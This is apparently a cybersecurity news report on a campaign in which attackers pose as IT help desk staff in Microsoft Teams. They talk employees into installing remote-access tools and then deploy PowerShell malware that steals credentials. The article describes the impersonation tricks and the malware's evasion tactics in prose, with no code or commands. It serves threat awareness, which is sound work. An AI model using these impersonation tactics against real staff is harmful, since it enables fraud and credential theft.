Cybercriminals Exploit Microsoft Teams to Achieve Remote Access Using PowerShell Malware
Cybercriminals are increasingly weaponising Microsoft Teams, taking advantage of the platform’s trusted role in corporate communications to deploy malware and gain control of victim systems. In a sophisticated campaign, threat actors impersonate IT support staff in Microsoft Teams chats to deceive employees into granting remote access, representing a dangerous evolution from traditional email-based phishing attacks. Social engineering remains a highly effective tactic for hackers, and as businesses have integrated platforms like Microsoft Teams into their core operations, attackers have adapted their strategies accordingly. The inherent trust that employees place in internal messaging creates a fertile ground for deception. Recent campaigns analysed by Permiso Cybersecurity researchers reveal a multi-stage attack that begins with a simple message and culminates in the deployment of potent, multifunctional malware.
The attack chain often initiates with a direct message or call from a newly created or compromised Microsoft Teams account. These accounts are crafted to appear legitimate, using display names such as “IT Support” or “Help Desk Specialist” to impersonate trusted personnel. Attackers frequently employ checkmark emojis to simulate a verified status and leverage Microsoft’s onmicrosoft.com domain structure to appear as if they are part of the organisation. By posing as IT staff addressing routine issues like system maintenance, attackers build rapport with their targets. Once trust is established, they persuade employees to install remote access software, such as QuickAssist or AnyDesk, under the guise of providing technical assistance. This critical step grants the attacker a direct foothold into the user’s machine and the corporate network. Recent incidents have shown that these malicious payloads have diversified, with the involvement of malware loaders like DarkGate and Matanbuchus. After securing remote access, the attacker executes a PowerShell command to download the primary malicious payload, which is equipped with capabilities for credential theft, establishing long-term persistence, and remote code execution. To evade detection and complicate removal, the malware can designate its own process as “critical,” causing the system to crash if terminated. It also employs a legitimate-looking Windows credential prompt to trick users into entering their passwords, which are then exfiltrated to an attacker-controlled server. Analysis of the payload’s code has revealed hardcoded encryption keys that link the campaign to a known financially motivated threat actor tracked as Water Gamayun (also known as Encry).
Categories: Cybersecurity Threats, Social Engineering Tactics, Malware Deployment Techniques
Tags: Cybercriminals, Microsoft Teams, Malware, Social Engineering, Phishing, Remote Access, PowerShell, Credential Theft, Attack Chain, DarkGate